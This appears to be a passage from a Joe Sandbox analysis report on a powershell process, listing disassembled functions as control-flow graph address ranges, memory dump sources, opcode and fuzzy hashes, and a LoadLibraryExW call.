                                                                          control_flow_graph 102 7ffd9b8d0a2b-7ffd9b8d0a6d 104 7ffd9b8d0c2c-7ffd9b8d0c41 102->104 105 7ffd9b8d0a73-7ffd9b8d0a7d 102->105 113 7ffd9b8d0c4b-7ffd9b8d0cb3 104->113 114 7ffd9b8d0c43-7ffd9b8d0c4a 104->114 106 7ffd9b8d0a96-7ffd9b8d0aa0 105->106 107 7ffd9b8d0a7f-7ffd9b8d0a94 105->107 106->104 109 7ffd9b8d0aa6-7ffd9b8d0ab0 106->109 107->106 111 7ffd9b8d0ac9-7ffd9b8d0ad3 109->111 112 7ffd9b8d0ab2-7ffd9b8d0abf 109->112 111->104 116 7ffd9b8d0ad9-7ffd9b8d0ae3 111->116 112->111 117 7ffd9b8d0ac1-7ffd9b8d0ac7 112->117 131 7ffd9b8d0cb5-7ffd9b8d0cb8 113->131 132 7ffd9b8d0cd4-7ffd9b8d0cde 113->132 114->113 119 7ffd9b8d0ae5-7ffd9b8d0af3 116->119 120 7ffd9b8d0afd-7ffd9b8d0b08 116->120 117->111 119->120 128 7ffd9b8d0af5-7ffd9b8d0afb 119->128 120->104 121 7ffd9b8d0b0e-7ffd9b8d0b18 120->121 124 7ffd9b8d0b1a-7ffd9b8d0b2d 121->124 125 7ffd9b8d0b2e-7ffd9b8d0b3f 121->125 124->125 125->104 130 7ffd9b8d0b45-7ffd9b8d0b4f 125->130 128->120 136 7ffd9b8d0b68-7ffd9b8d0b97 130->136 137 7ffd9b8d0b51-7ffd9b8d0b66 130->137 131->132 138 7ffd9b8d0cba-7ffd9b8d0cd1 131->138 134 7ffd9b8d0cea-7ffd9b8d0d2a 132->134 135 7ffd9b8d0ce0-7ffd9b8d0ce9 132->135 142 7ffd9b8d0b9b-7ffd9b8d0c29 136->142 137->136 138->132 142->104
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2402264153.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8d0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1?_L$6dg
                                                                          • API String ID: 0-2609699744
                                                                          • Opcode ID: 4b56c1925ef75966a71955a680c4719fbc4d7a0cb1ebde6bc4987c78dc4cde05
                                                                          • Instruction ID: d9ae2e9322db2800ce8a9b268e5d3cc9044962b6de78513715c52358883ac32a
                                                                          • Opcode Fuzzy Hash: 4b56c1925ef75966a71955a680c4719fbc4d7a0cb1ebde6bc4987c78dc4cde05
                                                                          • Instruction Fuzzy Hash: 8271893071EB4A5FDB99DF7884659757BE1EF9A310B0103BEC04ACB1A2DA25EC42C780
                                                                          Function 00007FFD9B816C24 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 148 7ffd9b816c24-7ffd9b816c2b 149 7ffd9b816c2d-7ffd9b816c35 148->149 150 7ffd9b816c36-7ffd9b816c9f 148->150 149->150 152 7ffd9b816ca1-7ffd9b816ca6 150->152 153 7ffd9b816ca9-7ffd9b816cdb LoadLibraryExW 150->153 152->153 154 7ffd9b816cdd 153->154 155 7ffd9b816ce3-7ffd9b816d0a 153->155 154->155
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2401510149.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b800000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 2ccf6326840d9c028e6821d8dd851bb5476c2a205257efbe283744cecac5c7fe
                                                                          • Instruction ID: 2e0319f3d65bf9fba592c4f4e227e22896459b674800aea19ddecfce3ce1262f
                                                                          • Opcode Fuzzy Hash: 2ccf6326840d9c028e6821d8dd851bb5476c2a205257efbe283744cecac5c7fe
                                                                          • Instruction Fuzzy Hash: 5E31F33190CA5C8FDB19DB988859BE9BBF0FF55320F04426FD049D3192CB74A805CB91
                                                                          Function 00007FFD9B81663A Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 157 7ffd9b81663a-7ffd9b816c9f 160 7ffd9b816ca1-7ffd9b816ca6 157->160 161 7ffd9b816ca9-7ffd9b816cdb LoadLibraryExW 157->161 160->161 162 7ffd9b816cdd 161->162 163 7ffd9b816ce3-7ffd9b816d0a 161->163 162->163
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2401510149.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b800000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 685f7af57d9e951ca8e247194bba16216d35b2bc25bd15ce006c93e1c69030ac
                                                                          • Instruction ID: d74357096dcb7f74b3da1bd5c952049c67d729357e33a75553b00ea3f3e3306f
                                                                          • Opcode Fuzzy Hash: 685f7af57d9e951ca8e247194bba16216d35b2bc25bd15ce006c93e1c69030ac
                                                                          • Instruction Fuzzy Hash: 4D218271A08A1C9FDB58DF9CD449BF9BBE1FB69311F10822ED04AD3651DB70A4058B81
                                                                          Function 00007FFD9B8D33D5 Relevance: .4, Instructions: 437COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 285 7ffd9b8d33d5-7ffd9b8d3464 288 7ffd9b8d346a-7ffd9b8d3474 285->288 289 7ffd9b8d36cc-7ffd9b8d378b 285->289 290 7ffd9b8d3476-7ffd9b8d3483 288->290 291 7ffd9b8d348d-7ffd9b8d3492 288->291 290->291 300 7ffd9b8d3485-7ffd9b8d348b 290->300 292 7ffd9b8d3498-7ffd9b8d349b 291->292 293 7ffd9b8d3670-7ffd9b8d367a 291->293 298 7ffd9b8d34b2 292->298 299 7ffd9b8d349d-7ffd9b8d34b0 292->299 296 7ffd9b8d3689-7ffd9b8d36c9 293->296 297 7ffd9b8d367c-7ffd9b8d3688 293->297 296->289 303 7ffd9b8d34b4-7ffd9b8d34b6 298->303 299->303 300->291 303->293 306 7ffd9b8d34bc-7ffd9b8d34f0 303->306 320 7ffd9b8d3507 306->320 321 7ffd9b8d34f2-7ffd9b8d3505 306->321 323 7ffd9b8d3509-7ffd9b8d350b 320->323 321->323 323->293 324 7ffd9b8d3511-7ffd9b8d3519 323->324 324->289 326 7ffd9b8d351f-7ffd9b8d3529 324->326 327 7ffd9b8d352b-7ffd9b8d3543 326->327 328 7ffd9b8d3545-7ffd9b8d3555 326->328 327->328 328->293 332 7ffd9b8d355b-7ffd9b8d358c 328->332 332->293 338 7ffd9b8d3592-7ffd9b8d35bb 332->338 343 7ffd9b8d35bc-7ffd9b8d35be 338->343 344 7ffd9b8d35e9 343->344 345 7ffd9b8d35c0-7ffd9b8d35e0 343->345 346 7ffd9b8d35eb-7ffd9b8d35ed 344->346 345->343 351 7ffd9b8d35e2-7ffd9b8d35e7 345->351 346->293 347 7ffd9b8d35f3-7ffd9b8d35fb 346->347 349 7ffd9b8d360b 347->349 350 7ffd9b8d35fd-7ffd9b8d3607 347->350 354 7ffd9b8d3610-7ffd9b8d3625 349->354 352 7ffd9b8d3609 350->352 353 7ffd9b8d3627-7ffd9b8d3656 350->353 351->346 352->354 359 7ffd9b8d365d-7ffd9b8d366f 353->359 354->353
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2402264153.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8d0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 034de4964786d877113816b612d806582ffc1b6948509b4aedf7a3e19326f100
                                                                          • Instruction ID: 46fa894df7d224bc65744708da36fcaeb542f277e9c02fe254f8d045a1d2a52c
                                                                          • Opcode Fuzzy Hash: 034de4964786d877113816b612d806582ffc1b6948509b4aedf7a3e19326f100
                                                                          • Instruction Fuzzy Hash: 3BD14872B0FA8E0FE7A59BA898655B57BE1EF99310B0903FBD04DC71E3D918A905C341